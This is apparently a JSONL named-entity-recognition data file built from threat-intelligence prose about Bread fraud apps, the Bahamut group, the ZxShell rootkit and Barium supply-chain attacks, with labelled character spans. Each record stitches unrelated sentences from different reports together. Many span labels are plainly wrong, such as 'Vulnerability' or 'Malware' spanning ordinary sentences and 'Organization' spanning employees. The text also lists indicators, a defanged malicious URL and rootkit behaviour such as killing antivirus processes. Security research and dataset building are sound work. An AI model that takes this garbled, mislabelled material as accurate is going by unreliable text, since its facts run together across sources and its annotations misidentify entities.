\u201c So good luck , I \u2019m sure we \u2019ll talk again soon , but for now , I ve got better things in the oven , \u201d Harrison wrote to Biderman after his employment contract with Ashley Madison was terminated .", "spans": [{"start": 71, "end": 75, "label": "Organization"}, {"start": 89, "end": 102, "label": "Organization"}, {"start": 107, "end": 116, "label": "Organization"}, {"start": 193, "end": 199, "label": "System"}, {"start": 307, "end": 315, "label": "Organization"}, {"start": 325, "end": 333, "label": "Organization"}, {"start": 369, "end": 383, "label": "Organization"}]} {"text": "In green , we can see the references to the SMS API . However , in the same week of September a series of spearphishing attempts once again targeted a set of otherwise unrelated individuals , employing the same tactics as before . To allow the VNC session to connect , the current network socket WSAProtcol_Info structure is written to a named pipe prior to calling zxFunction001 . zxFunction001 modifies the current process memory , uses data contained in the named pipe to create a socket , and then executes the code that sends the remote desktop session to the server controller . The rare opportunity to examine Sharpshooter 's backend operations allowed the researchers to create a fuller picture of the activity and interaction between the various tools used by the threat actor .", "spans": [{"start": 244, "end": 247, "label": "System"}, {"start": 296, "end": 311, "label": "System"}, {"start": 617, "end": 651, "label": "System"}]} {"text": "In red , we see those values being passed into the suspicious Java method through the registered interface . Our primary contribution in this update is to implicate Bahamut in what are likely counterterrorism-motivated surveillance operations , and to further affirm our belief that the group is a hacker-for-hire operation . 
ZxFunction002 This will either bind the calling process to a port or has the calling process connect to a remote host . Therefore , there are cases where these vulnerabilities are accessible via the internet .", "spans": [{"start": 486, "end": 533, "label": "Vulnerability"}]} {"text": "Now , using these strings method1 can use reflection to call sendTextMessage and process the payment . As we wrote then , compared to Kingphish , Bahamut operates as though it were a generation ahead in terms of professionalism and ambition . The functionality ( connect or bind ) depends on the data contained within the named pipe . This has been coined as the Mark Heptad yes after this author and creator .", "spans": [{"start": 363, "end": 374, "label": "Organization"}]} {"text": "PACKING In addition to implementing custom obfuscation techniques , apps have used several commercially available packers including : Qihoo360 , AliProtect and SecShell . In the Bahamut report , we discussed two domains found within our search that were linked with a custom Android malware agent . Unlike zxFunction001, this is not used by The SCIL commands would have caused the MicroSCADA server to relay the commands to the substation RTUs via either the IEC-60870 - 5 - 104 protocol for TCP / IP connections or the IEC-60870 - 5 - 101 protocol for serial connections .", "spans": [{"start": 134, "end": 142, "label": "System"}, {"start": 145, "end": 155, "label": "System"}, {"start": 160, "end": 168, "label": "System"}, {"start": 212, "end": 219, "label": "System"}, {"start": 268, "end": 296, "label": "System"}, {"start": 381, "end": 398, "label": "System"}]} {"text": "More recently , we have seen Bread-related apps trying to hide malicious code in a native library shipped with the APK . After the publication of the original report , these sites were taken offline despite the fact that one agent was even updated a six days prior to our post ( the \" Khuai \" application ) . 
any of the RAT commands in the zxshell.dll . There are several indicators of compromise that organizations should monitor .", "spans": [{"start": 29, "end": 42, "label": "Malware"}, {"start": 285, "end": 290, "label": "System"}, {"start": 320, "end": 323, "label": "System"}, {"start": 340, "end": 351, "label": "Indicator"}]} {"text": "Earlier this year , we discovered apps hiding a JAR in the data section of an ELF file which it then dynamically loads using DexClassLoader . FIF is notable for its links to the Lashkar-e-Taiba ( LeT ) terrorist organization , which has committed mass-casualty attacks in India in support of establishing Pakistani control over the disputed Jammu and Kashmir border region . Apart from user-mode ZxShell droppers mentioned earlier , there is a file ( SHA256 : 1e200d0d3de360d9c32e30d4c98f07e100f6260a86a817943a8fb06995c15335 ) that installs a kernel device driver called loveusd.sys . None After initial access via this new exploit method , the threat actor leveraged maintain access , and performed anti - forensics techniques on the Microsoft Exchange server in an attempt to hide their activity .", "spans": [{"start": 396, "end": 403, "label": "Malware"}, {"start": 460, "end": 524, "label": "Indicator"}, {"start": 571, "end": 582, "label": "Indicator"}, {"start": 735, "end": 760, "label": "System"}]} {"text": "The figure below shows a fragment of encrypted JAR stored in .rodata section of a shared object shipped with the APK as well as the XOR key used for decryption . As a result , it is already flagged as Bahamut by antivirus engines . The architecture of this dropper is different from the others : it starts extracting the main driver from itself . 
A new report from the Malwarebytes Threat Intelligence team shows 1,900 total ransomware attacks within just four countries \u2014 the US , Germany , France , and the UK \u2014 in one year .", "spans": [{"start": 369, "end": 406, "label": "Organization"}]} {"text": "After we blocked those samples , they moved a significant portion of malicious functionality into the native library , which resulted in a rather peculiar back and forth between Dalvik and native code : COMMAND & CONTROL Dynamic Shortcodes & Content Early versions of Bread utilized a basic command and control infrastructure to dynamically deliver content and retrieve billing details . Our initial observation of the Bahamut group originated from in-the-wild attempts to deceive targets into providing account passwords through impersonation of platform providers . It adds the SeLoadDriver privilege to its access token and proceeds to install the driver as a fake disk filter driver . In its spear phish , CloudLook also used a self - extracting archive containing a PDF file that lured its victims with information regarding world terrorism .", "spans": [{"start": 547, "end": 565, "label": "Organization"}, {"start": 580, "end": 592, "label": "System"}, {"start": 710, "end": 719, "label": "Malware"}]} {"text": "In the example server response below , the green fields show text to be shown to the user . One curious trait of Bahamut is that it develops fully-functional applications in support of its espionage activities , rather than push nonfunctional fake apps or bundle malware with legitimate software . It then adds the \u201c Loveusd.sys \u201d extracted driver name to the upper filter list . 
In the case of ProxyNotShell , the targeted backend service is the Remote PowerShell service .", "spans": [{"start": 276, "end": 295, "label": "System"}, {"start": 317, "end": 328, "label": "Indicator"}, {"start": 447, "end": 472, "label": "System"}]} {"text": "The red fields are used as the shortcode and keyword for SMS billing . Curiously , Bahamut appears to track password attempts in response to failed phishing attempts or to provoke the target to provide more passwords . In our analysed sample the \u201c Loveusd.sys \u201d driver is installed with the name \u201c USBHPMS \u201d . In some cases , the threat actors may have been using compromised organizations to gain access to other victims in supplychaintype attacks .", "spans": [{"start": 248, "end": 259, "label": "Indicator"}, {"start": 298, "end": 305, "label": "Indicator"}, {"start": 330, "end": 343, "label": "Organization"}]} {"text": "State Machines Since various carriers implement the billing process differently , Bread has developed several variants containing generalized state machines implementing all possible steps . Bahamut spearphishing attempts have also been accompanied with SMS messages purporting to be from Google about security issues on their account , including a class 0 message or \" flash text \" . Finally the driver is started using the ZwLoadDriver native API . Most of the time , unsolicited messages from various people are the first entry point .", "spans": [{"start": 82, "end": 87, "label": "Malware"}, {"start": 289, "end": 295, "label": "Organization"}]} {"text": "At runtime , the apps can check which carrier the device is connected to and fetch a configuration object from the command and control server . These text messages did not include links but are intended to build credibility around the fake service notifications later sent to the target 's email address . 
The ZxShell driver starts by acquiring some kernel information and then hooking \u201c ObReferenceObjectByHandle \u201d API . UNC4899 's targeting is selective , and they have been observed gaining access to victim networks through JumpCloud .", "spans": [{"start": 310, "end": 317, "label": "Malware"}, {"start": 422, "end": 442, "label": "Organization"}, {"start": 528, "end": 537, "label": "System"}]} {"text": "The configuration contains a list of steps to execute with URLs and JavaScript . We have not found evidence of Bahamut engaging in crime or operating outside its limited geographic domains , although this narrow perspective could be accounted for by its compartmentalization of operations . Finally it spawns 2 system threads . I will use Qiling in the emulation .", "spans": [{"start": 111, "end": 118, "label": "Organization"}, {"start": 339, "end": 345, "label": "System"}]} {"text": "The steps implemented include : Load a URL in a WebView Run JavaScript in WebView Toggle WiFi state Toggle mobile data state Read/modify SMS inbox Solve captchas Captchas One of the more interesting states implements the ability to solve basic captchas ( obscured letters and numbers ) . Thus far , Bahamut 's campaigns have appeared to be primarily espionage or information operations \u2013 not destructive attacks or fraud . The first thread is the \u201c communication \u201d thread . If executed successfully , LIGHTWORK provides the operator the following command - line output : Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis .", "spans": [{"start": 299, "end": 306, "label": "Organization"}, {"start": 449, "end": 462, "label": "System"}, {"start": 501, "end": 510, "label": "Malware"}]} {"text": "First , the app creates a JavaScript function to call a Java method , getImageBase64 , exposed to WebView using addJavascriptInterface . 
The targets and themes of Bahamut 's campaigns have consistently fallen within two regions \u2013 South Asia ( primarily Pakistan , specifically Kashmir ) and the Middle East ( from Morocco to Iran ) . ZxShell employs a strange method for communication : it hooks the NtWriteFile API and recognizes 5 different special handle values as commands : In this blog post , we show how the newly found Kritec skimmer was found along side one of its competitors .", "spans": [{"start": 334, "end": 341, "label": "Malware"}, {"start": 527, "end": 541, "label": "Malware"}]} {"text": "The value used to replace GET_IMG_OBJECT comes from the JSON configuration . Our prior publication also failed to acknowledge immensely valuable input from a number of colleagues , including Nadim Kobeissi 's feedback on how the API endpoints on the Android malware were encrypted . 0x111111111 : Hide \u201c Loveusd \u201d driver from the system kernel driver list . 0x22222222 : Securely delete an in-use or no-access target file-name . 0x44444444 : Unhook the ZwWriteFile API and hook KiFastCallEntry . 0x55555555 : Remove the ZxShell Image Load Notify routine . 0x88888888 : Set a special value called \u201c type \u201d in Windows registry key HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\DriverMain . 
Ukraine \u2019s Computer Emergency Response Team ( CERT - UA ) has attributed the July campaign to the threat actor group UNC1151 , as a part of the GhostWriter operational activities allegedly linked to the Belarusian government .", "spans": [{"start": 250, "end": 265, "label": "System"}, {"start": 520, "end": 527, "label": "Malware"}, {"start": 608, "end": 615, "label": "System"}, {"start": 689, "end": 732, "label": "Organization"}, {"start": 735, "end": 744, "label": "Organization"}, {"start": 806, "end": 813, "label": "Organization"}, {"start": 833, "end": 867, "label": "Organization"}, {"start": 888, "end": 915, "label": "Organization"}]} {"text": "The app then uses JavaScript injection to create a new script in the carrier \u2019 s web page to run the new function . Bahamut targeted similar Qatar-based individuals during their campaign . The second Loveusd system thread does a lot of things . In other news , a suspected LockBit affiliate named Ruslan Magomedovich Astamirov , a 20 - year - old from the Chechen Republic , was arrested in Arizona last month .", "spans": [{"start": 116, "end": 123, "label": "Organization"}, {"start": 200, "end": 207, "label": "System"}, {"start": 273, "end": 280, "label": "Organization"}, {"start": 297, "end": 326, "label": "Organization"}]} {"text": "The base64-encoded image is then uploaded to an image recognition service . Bellingcat also reported the domain had been used previously to host potential decoy documents as detailed in VirusTotal here using hxxp://voguextra.com/decoy.doc . Its principal duties are to create the ZxShell main DLL in \u201c c:\\Windows\\System32\\commhlp32.dll \u201d and to install the Kernel \u201c Load Image Notify routine \u201d . 
We provide at - risk organizations with the following discovery methods to conduct threat hunts for tactics , techniques , and procedures ( TTPs ) implemented derived from the toolset : \u2022 Establish collection and aggregation of host - based logs for crown jewels systems such as human - machine interfaces ( HMI ) , engineering workstations ( EWS ) , and OPC client servers within their environments and review logs for the evidence of Python script or unauthorized code execution on these systems .", "spans": [{"start": 76, "end": 86, "label": "Organization"}, {"start": 155, "end": 170, "label": "Malware"}, {"start": 208, "end": 238, "label": "Malware"}, {"start": 280, "end": 287, "label": "Malware"}, {"start": 293, "end": 296, "label": "System"}, {"start": 302, "end": 335, "label": "Indicator"}, {"start": 366, "end": 391, "label": "System"}, {"start": 412, "end": 430, "label": "Organization"}, {"start": 675, "end": 707, "label": "System"}, {"start": 712, "end": 736, "label": "System"}, {"start": 739, "end": 742, "label": "System"}, {"start": 751, "end": 795, "label": "System"}, {"start": 820, "end": 893, "label": "Indicator"}]} {"text": "If the text is retrieved successfully , the app uses JavaScript injection again to submit the HTML form with the captcha answer . The China-backed BARIUM APT is suspected to be at the helm of the project . The code then tries to kill each process and service that belongs to the following list of AV products : Symantec B-TOOL S-IDTY Firewall Norton ESET McAfee Avast Avira Sophos Malwarebytes . 
The name of the shortcut file , depending on the campaign , is either randomly generated by a random string generator function or hardcoded in the macro code .", "spans": [{"start": 343, "end": 349, "label": "System"}, {"start": 350, "end": 354, "label": "System"}, {"start": 355, "end": 361, "label": "System"}, {"start": 362, "end": 367, "label": "System"}, {"start": 368, "end": 373, "label": "System"}, {"start": 374, "end": 380, "label": "System"}, {"start": 381, "end": 393, "label": "System"}, {"start": 466, "end": 522, "label": "Organization"}, {"start": 526, "end": 553, "label": "Organization"}]} {"text": "CLOAKING Client-side Carrier Checks In our basic command & control example above , we didn \u2019 t address the ( incorrectly labeled ) \u201c imei \u201d field . Trojanized versions of the utility were then signed with legitimate certificates and were hosted on and distributed from official ASUS update servers \u2013 which made them mostly invisible to the vast majority of protection solutions , according to Kaspersky Lab . Next , the ZxShell Load-Image Notify function prevents the AV processes from restarting . The gang attacked 10 victims last month , the majority of them being from the Information and Communications Technology ( ICT ) sectors .", "spans": [{"start": 393, "end": 406, "label": "Organization"}, {"start": 420, "end": 427, "label": "Malware"}, {"start": 577, "end": 634, "label": "Organization"}]} {"text": "This contains the Mobile Country Code ( MCC ) and Mobile Network Code ( MNC ) values that the billing process will work for . Kaspersky Lab To compromise the utility , Kaspersky Lab determined that the cyberattackers used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The installation procedure continues in the user-mode dropper . 
A survey conducted by security firm OneLogin found that only about half of IT decision makers were very confident that former employees were no longer able to access corporate applications .", "spans": [{"start": 126, "end": 139, "label": "Organization"}, {"start": 168, "end": 181, "label": "Organization"}, {"start": 474, "end": 482, "label": "Organization"}, {"start": 494, "end": 626, "label": "Vulnerability"}]} {"text": "In this example , the server response contains several values for Thai carriers . To compromise the utility , Kaspersky Lab determined that Barium used stolen digital certificates used by ASUS to sign legitimate binaries , and altered older versions of ASUS software to inject their own malicious code . The ZxShell service is installed as usual , and the in-execution dropper is deleted permanently using the special handle value 0x22222222 for the WriteFile API call . Ransomware builders usually have a user interface that allows users to choose the underlying features and customize the configurations to build a new ransomware binary executable without exposing the source code or needing a compiler installed .", "spans": [{"start": 110, "end": 123, "label": "Organization"}, {"start": 308, "end": 315, "label": "Malware"}, {"start": 471, "end": 490, "label": "Malware"}, {"start": 499, "end": 714, "label": "Malware"}]} {"text": "The app checks if the device \u2019 s network matches one of those provided by the server . BARIUM , a Chinese state player that also goes by APT17 , Axiom and Deputy Dog , was previously linked to the ShadowPad and CCleaner incidents , which were also supply-chain attacks that used software updates to sneak onto machines . This handle value is invalid : all the windows kernel handle values are by design a multiple of 4 . 
It has an interesting way of loading the malicious JavaScript we had not seen before either .", "spans": [{"start": 87, "end": 93, "label": "Organization"}, {"start": 137, "end": 142, "label": "Organization"}, {"start": 145, "end": 150, "label": "Organization"}, {"start": 155, "end": 161, "label": "Organization"}, {"start": 162, "end": 165, "label": "Organization"}, {"start": 197, "end": 206, "label": "System"}, {"start": 211, "end": 219, "label": "System"}, {"start": 279, "end": 295, "label": "System"}, {"start": 360, "end": 367, "label": "System"}]} {"text": "If it does , it will commence with the billing process . That said , the \" fingerprints \" left on the samples by the attackers \u2013 including techniques used to achieve unauthorized code execution \u2013 suggest that the BARIUM APT is behind the effort , according to the researchers . The ZxShell hook code knows that and intercept it . None The discovery was part of recent CrowdStrike Services investigations into several Play ransomware intrusions where the common entry vector was confirmed to be Microsoft Exchange .", "spans": [{"start": 213, "end": 223, "label": "Organization"}, {"start": 282, "end": 289, "label": "Malware"}, {"start": 368, "end": 388, "label": "Organization"}, {"start": 417, "end": 443, "label": "Organization"}, {"start": 494, "end": 512, "label": "System"}]} {"text": "If the value does not match , the app skips the \u201c disclosure \u201d page and billing process and brings the user straight to the app content . In the 2017 ShadowPad attack , the update mechanism for Korean server management software provider NetSarang was compromised to serve up an eponymous backdoor . ObReferenceObjectByHandle is a Kernel routine designed to validate a target object and return the pointer to its object body ( and even its handle information ) , starting from the object handle ( even the user-mode one ) . 
An example of these log entries can be found below : By correlating the user , IP address and GUID from the Remote PowerShell HTTP logs to the Exchange frontend , CrowdStrike found a request using the mailbox to the following OWA URL , , corresponding to the IIS log entry below : The backend request for the new exploitation chain is similar to the example shown below : This request seemed to show a novel , previously undocumented , way to reach the PowerShell remoting service through the OWA frontend endpoint , instead of leveraging the endpoint .", "spans": [{"start": 201, "end": 236, "label": "Organization"}, {"start": 576, "end": 795, "label": "Malware"}, {"start": 895, "end": 1074, "label": "Malware"}]} {"text": "In some versions , the server would only return valid responses several days after the apps were submitted . In the next incident , also in 2017 , software updates for the legitimate computer cleanup tool CCleaner was found to have been compromised by hackers to taint them with the same ShadowPad backdoor . The hook installed by ZxShell implements one of its filtering routine . A full report describing the timeline of DUCKTAIL \u2019s activities , a detailed analysis of its malware component , and appendices containing indicators of compromise , Yara detection rules , metadata , and MITRE ATT&CK techniques can be downloaded from a link on this page .", "spans": [{"start": 147, "end": 163, "label": "System"}, {"start": 288, "end": 306, "label": "System"}, {"start": 331, "end": 338, "label": "Malware"}, {"start": 422, "end": 433, "label": "Organization"}, {"start": 474, "end": 481, "label": "Malware"}, {"start": 547, "end": 551, "label": "Organization"}, {"start": 585, "end": 597, "label": "Organization"}]} {"text": "Server-side Carrier Checks In the JavaScript bridge API obfuscation example covered above , the server supplied the app with the necessary strings to complete the billing process . 
NetSarang , which has headquarters in South Korea and the United States , removed the backdoored update , but not before it was activated on at least one victim 's machine in Hong Kong . It filters each attempt to open the ZxShell protected driver or the main DLL , returning a reference to the \u201c netstat.exe \u201d file . Figure 11 : Sandworm TANKTRAP GPO 2", "spans": [{"start": 404, "end": 411, "label": "Malware"}, {"start": 441, "end": 444, "label": "System"}, {"start": 478, "end": 489, "label": "Indicator"}, {"start": 511, "end": 532, "label": "Malware"}]} {"text": "However , analysts may not always see the indicators of compromise in the server \u2019 s response . Given our increased confidence that Bahamut was responsible for targeting of Qatari labor rights advocates and its focus on the foreign policy institutions other Gulf states , Bahamut 's interests are seemingly too expansive to be limited one sponsor or customer . The protection is enabled to all processes except for ones in the following list : Svchost.exe , Lsass.exe , Winlogon.exe , Services.exe , Csrss.exe , ctfmon.exe , Rundll32.exe , mpnotify.exe , update.exe . 
The first with a valid handle to close the process created .", "spans": [{"start": 180, "end": 202, "label": "Organization"}, {"start": 224, "end": 251, "label": "Organization"}, {"start": 444, "end": 455, "label": "Indicator"}, {"start": 458, "end": 467, "label": "Indicator"}, {"start": 470, "end": 482, "label": "Indicator"}, {"start": 485, "end": 497, "label": "Indicator"}, {"start": 500, "end": 509, "label": "Indicator"}, {"start": 512, "end": 522, "label": "Indicator"}, {"start": 525, "end": 537, "label": "Indicator"}, {"start": 540, "end": 552, "label": "Indicator"}, {"start": 555, "end": 565, "label": "Indicator"}, {"start": 568, "end": 628, "label": "Malware"}]} {"text": "In this example , the requests to the server take the following form : Here , the \u201c operator \u201d query parameter is the Mobile Country Code and Mobile Network Code . Barium specializes in targeting high value organizations holding sensitive data , by gathering extensive information about their employees through publicly available information and social media , using that information to fashion phishing attacks intended to trickthose employees into compromising their computers and networks . If the type of the object that the system is trying to validate is a process , the hook code rewrites again the configuration data of the ZxShell service in the windows registry . \u201c s1.txt \u201d , which likely contains the unauthorized MicroSCADA commands", "spans": [{"start": 293, "end": 302, "label": "Organization"}, {"start": 346, "end": 358, "label": "Organization"}, {"start": 435, "end": 444, "label": "Organization"}, {"start": 632, "end": 639, "label": "Malware"}, {"start": 655, "end": 662, "label": "System"}, {"start": 674, "end": 745, "label": "Indicator"}]} {"text": "The server can use this information to determine if the user \u2019 s carrier is one of Bread \u2019 s targets . 
We identified an overlap in the domain voguextra.com , which was used by Bahamut within their \" Devoted To Humanity \" app to host an image file and as C2 server by the PrayTime iOS app mentioned in our first post . The last type of Kernel modification that ZxShell rootkit performs is the system call dispatcher ( KiFastCallEntry ) hook . Talos researchers recently discovered multiple vulnerabilities in Open Babel , an open - source software library used in a variety of chemistry and research settings .", "spans": [{"start": 83, "end": 88, "label": "Malware"}, {"start": 176, "end": 183, "label": "Organization"}, {"start": 199, "end": 218, "label": "Malware"}, {"start": 360, "end": 367, "label": "Malware"}, {"start": 442, "end": 459, "label": "Organization"}, {"start": 508, "end": 518, "label": "System"}]} {"text": "If not , the response is scrubbed of the strings used to complete the billing fraud . Althoughthe BariumDefendants have relied on differentand distinct infrastructures in an effortto evade detection , Bariumused the same e-mail address (hostay88@gmail.com ) to register malicious domains used in connection with at least two toolsets that Barium has employed to compromise victim computers . In this manner , ZxShell is able to completely hide itself , intercepting the following Kernel API calls : ZwAllocateVirtualMemory , ZwOpenEvent , ZwQueryDirectoryFile , ZwWriteFile , ZwEnumerateKey , and ZwDeviceIoControlFile . CADDYWIPER is a disruptive wiper written in C that is focused on making data irrecoverable and causing maximum damage within an environment .", "spans": [{"start": 339, "end": 345, "label": "Organization"}, {"start": 409, "end": 416, "label": "Malware"}, {"start": 621, "end": 631, "label": "Malware"}, {"start": 637, "end": 666, "label": "Malware"}]} {"text": "MISLEADING USERS Bread apps sometimes display a pop-up to the user that implies some form of compliance or disclosure , showing terms and conditions or a confirm button . 
The second method , described in Part D.2 , below , involves the \" ShadowPad \" malware , which the Barium Defendants have distributed via a third-party software provider 's compromised update . Command and Control Server : Sample ( SHA256 : 1eda7e556181e46ba6e36f1a6bfe18ff5566f9d5e51c53b41d08f9459342e26c ) is configured to act as a server . Please address comments about this page to nvd@nist.gov .", "spans": [{"start": 17, "end": 22, "label": "Malware"}, {"start": 238, "end": 247, "label": "System"}, {"start": 270, "end": 276, "label": "Organization"}, {"start": 311, "end": 340, "label": "Organization"}, {"start": 365, "end": 384, "label": "System"}, {"start": 412, "end": 476, "label": "Indicator"}, {"start": 557, "end": 569, "label": "Organization"}]} {"text": "However , the actual text would often only display a basic welcome message . To enhance the effectiveness of phishing attacks into the organization , Barium will collect additional background informationfrom social media sites . The symbol \u201c g_bCreateListenSck \u201d is set to 1 . Of the two file types , the PowerPoint files are more unusual in that they would not show any actual slides when opened , but would still execute the malicious VBA code , a finding consistent with CERT - UA \u2019s analysis .", "spans": [{"start": 150, "end": 156, "label": "Organization"}, {"start": 208, "end": 220, "label": "Organization"}, {"start": 403, "end": 445, "label": "Malware"}]} {"text": "Other versions included all the pieces needed for a valid disclosure message . Employing a technique known as \" spear phishing \" , Barium has heavily targeted individuals within HumanResources or Business Developmentdepartments ofthe targeted organizations in order to compromise the computers ofsuch individuals . This means that , as seen above , the ZxShell Dll is started in listening mode . 
The videos were quickly passed around offices while users \u2019 systems were silently infected in the background , and many of the APT \u2019s components were signed with phony Intel and AMD digital certificates .", "spans": [{"start": 131, "end": 137, "label": "Organization"}, {"start": 353, "end": 360, "label": "Malware"}, {"start": 361, "end": 364, "label": "System"}]} {"text": "However , there are still two issues here : The numbers to contact for cancelling the subscription are not real The billing process commences even if you don \u2019 t hit the \u201c Confirm \u201d button Even if the disclosure here displayed accurate information , the user would often find that the advertised functionality of the app did not match the actual content . The first method , described in Part D.l , below , involves the \" Barlaiy \" and \" PlugXL \" malware , which the Barium Defendants propagate using phishing techniques . It connects to the first remote C&C that tries to contact it and succeeds in the handshake . When combined with the data from your vulnerability scanners , it delivers a full picture of the exposures in your environment .", "spans": [{"start": 422, "end": 429, "label": "System"}, {"start": 438, "end": 444, "label": "System"}, {"start": 555, "end": 558, "label": "System"}]} {"text": "Bread apps frequently contain no functionality beyond the billing process or simply clone content from other popular apps . Using the information gathered from its reconnaissance on social media sites , Barium packages the phishing e-mail in a way that gives the e-mail credibility to the target user , often by making the e-mail appear as ifit were sent from an organization known to and trusted by the victim or concerning a topic of interest to the victim . The encrypted IP address is \u201c 127.0.0.2 \u201d ( used as loopback ) and no connection is made on that IP address ( due to the listening variable set to 1 ) . 
Zarya \u2019s Telegram channel was created in March 2022 , although the group \u2019s alleged leader claimed that elements of Zarya existed well before this , and were previously known by various names including \u201c 0x000000 \u201d and \u201c Quarantine \u201d ( Russian : \u041a\u0430\u0440\u0430\u043d\u0442\u0438\u043d ) .", "spans": [{"start": 0, "end": 5, "label": "Malware"}, {"start": 182, "end": 194, "label": "Organization"}, {"start": 203, "end": 209, "label": "Organization"}, {"start": 491, "end": 500, "label": "Indicator"}, {"start": 614, "end": 639, "label": "Organization"}, {"start": 730, "end": 735, "label": "Organization"}, {"start": 818, "end": 826, "label": "Organization"}, {"start": 835, "end": 845, "label": "Organization"}, {"start": 850, "end": 868, "label": "Organization"}]} {"text": "VERSIONING Bread has also leveraged an abuse tactic unique to app stores : versioning . Barium Defendants install the malicious \" Win32/Barlaiy \" malware and the malicious \" Win32/PlugX.L \" malware on victim computers using the means described above . We used the ZxShell package for version 3.10 ( SHA256 : 1622460afbc8a255141256cb77af61c670ec21291df8fe0989c37852b59422b4 ).The convenient thing about this is that the CNC panel worked with any version , 3.10 and above . Lowcode automation of processes can make the required actions fast , reliable , and repeatable .", "spans": [{"start": 11, "end": 16, "label": "Malware"}, {"start": 88, "end": 94, "label": "Organization"}, {"start": 130, "end": 143, "label": "System"}, {"start": 174, "end": 187, "label": "System"}, {"start": 264, "end": 271, "label": "Malware"}, {"start": 308, "end": 372, "label": "Indicator"}, {"start": 419, "end": 428, "label": "System"}]} {"text": "Some apps have started with clean versions , in an attempt to grow user bases and build the developer accounts \u2019 reputations . 
Both Win32/Barlaiy & Win32/PlugX.L are remote access \" trojans \" , which allow Barium to gather a victim 's information , control a victim 's device , install additional malware , and exfiltrate information fi-om a victim 's device . The buttons are all in Chinese , with the help of Google Translate and keen detective skills ( read : button clicking ) , we \u2019ve deciphered the functionality . These group policies contained instructions to copy a file from a server to the local hard drive and to schedule a task to run the copied file at a particular time .", "spans": [{"start": 132, "end": 145, "label": "System"}, {"start": 148, "end": 161, "label": "System"}, {"start": 206, "end": 212, "label": "Organization"}, {"start": 411, "end": 427, "label": "System"}]} {"text": "Only later is the malicious code introduced , through an update . Barium Defendants install the malicious credential stealing and injection tool known as \" Win32/RibDoor.A!dha \" . Once an infected machine connects , you see its information displayed in a selection box at the top . An attacker could exploit these issues by tricking a user into opening a specially crafted PDF document or , if the user has the browser extension enabled , by visiting a malicious web page :", "spans": [{"start": 66, "end": 72, "label": "Organization"}, {"start": 156, "end": 175, "label": "System"}, {"start": 285, "end": 293, "label": "Organization"}]} {"text": "Interestingly , early \u201c clean \u201d versions contain varying levels of signals that the updates will include malicious code later . While not detected at the time , Microsoft 's antivirus and security products now detect this Barium malicious file and flag the file as \" Win32/ShadowPad.A \" . There are some built in functions on the side for the more common features . 
The sample of LIGHTWORK we obtained includes eight hardcoded IEC-104 information object addresses ( IOA ) , which typically correlate with input or output data elements on a device and may correspond to power line switches or circuit breakers in an RTU or relay configuration .", "spans": [{"start": 161, "end": 170, "label": "Organization"}, {"start": 222, "end": 228, "label": "Organization"}, {"start": 267, "end": 284, "label": "Malware"}, {"start": 380, "end": 389, "label": "System"}, {"start": 411, "end": 641, "label": "Indicator"}]} {"text": "Some are first uploaded with all the necessary code except the one line that actually initializes the billing process . MXI Player appears to be a version of the Bahamut agent , designed to record the phone calls and collect other information about the user ( com.mxi.videoplay ) . These include remote desktop , webcam spying , remote shell , and file management . By the end of 2022 , Cuba ransomware threat actors had compromised over 100 organizations worldwide .", "spans": [{"start": 120, "end": 130, "label": "Malware"}, {"start": 190, "end": 212, "label": "Malware"}, {"start": 217, "end": 242, "label": "Malware"}, {"start": 387, "end": 416, "label": "Organization"}]} {"text": "Others may have the necessary permissions , but are missing the classes containing the fraud code . Figure 9a , below , shows detections of encounters with the Barium actors and their infrastructure , including infected computers located in Virginia , and Figure 9b , below , shows detections of encounters throughout the United States . You can also select a host and type help for a full list of commands . \u2022 Identify and investigate the creation , transfer , and/or execution of unauthorized Python - packaged executables ( e.g. 
, PyInstaller or Py2Exe ) on OT systems or systems with access to OT resources .", "spans": [{"start": 534, "end": 545, "label": "System"}, {"start": 549, "end": 555, "label": "System"}, {"start": 561, "end": 571, "label": "System"}, {"start": 575, "end": 610, "label": "System"}]} {"text": "And others have all malicious content removed , except for log comments referencing the payment process . Barium has targeted Microsoft customers both in Virginia , the United States , and around the world . I have the same machine infected with two different version of ZxShell . As opposed to the PowerPoint documents that did not display any slides in our testing environments , all Excel documents display legitimate - looking documents related to the targeted military organizations , or generic descriptions on how to enable VBA macro functionality in Excel .", "spans": [{"start": 106, "end": 112, "label": "Organization"}, {"start": 126, "end": 145, "label": "Organization"}, {"start": 271, "end": 278, "label": "Malware"}, {"start": 531, "end": 540, "label": "System"}]} {"text": "All of these methods attempt to space out the introduction of possible signals in various stages , testing for gaps in the publication process . Once the Barium Defendants have access to a victim computer through the malware described above , they monitor the victim 's activity and ultimately search for and steal sensitive documents ( for example , exfiltration of intellectual property regarding technology has been seen ) , and personal information fi\"om the victim 's network . Sending the help command for each , you can see the extra features added between version 3.1 and 3.2 . 
The \u201c ExecStart \u201d value specifies the path of the program to be run , which in this case was GOGETTER .", "spans": [{"start": 399, "end": 409, "label": "Organization"}, {"start": 679, "end": 687, "label": "System"}]} {"text": "However , GPP does not treat new apps and updates any differently from an analysis perspective . According to a 49-page report published Thursday , all of the attacks are the work of Chinese government 's intelligence apparatus , which the report 's authors dub the Winnti Umbrella . Keylogging , ZXARPS ( IP and URL spoofing ) , and SYNFlood are some of the interesting features added to version 3.2 . The content of the form is legitimate and targets Ukrainian government organizations , as seen in the image below .", "spans": [{"start": 266, "end": 281, "label": "Organization"}, {"start": 297, "end": 303, "label": "Malware"}, {"start": 453, "end": 487, "label": "Organization"}]} {"text": "FAKE REVIEWS When early versions of apps are first published , many five star reviews appear with comments like : \u201c So .. good .. \u201d \u201c very beautiful \u201d Later , 1 star reviews from real users start appearing with comments like : \u201c Deception \u201d \u201c The app is not honest \u2026 \u201d SUMMARY Sheer volume appears to be the preferred approach for Bread developers . Researchers from various security organizations have used a variety of names to assign responsibility for the hacks , including LEAD , BARIUM , Wicked Panda , GREF , PassCV , Axiom , and Winnti . In versions 3.1 \u2013 3.21, the configuration info is xor encoded with 0x85 . 
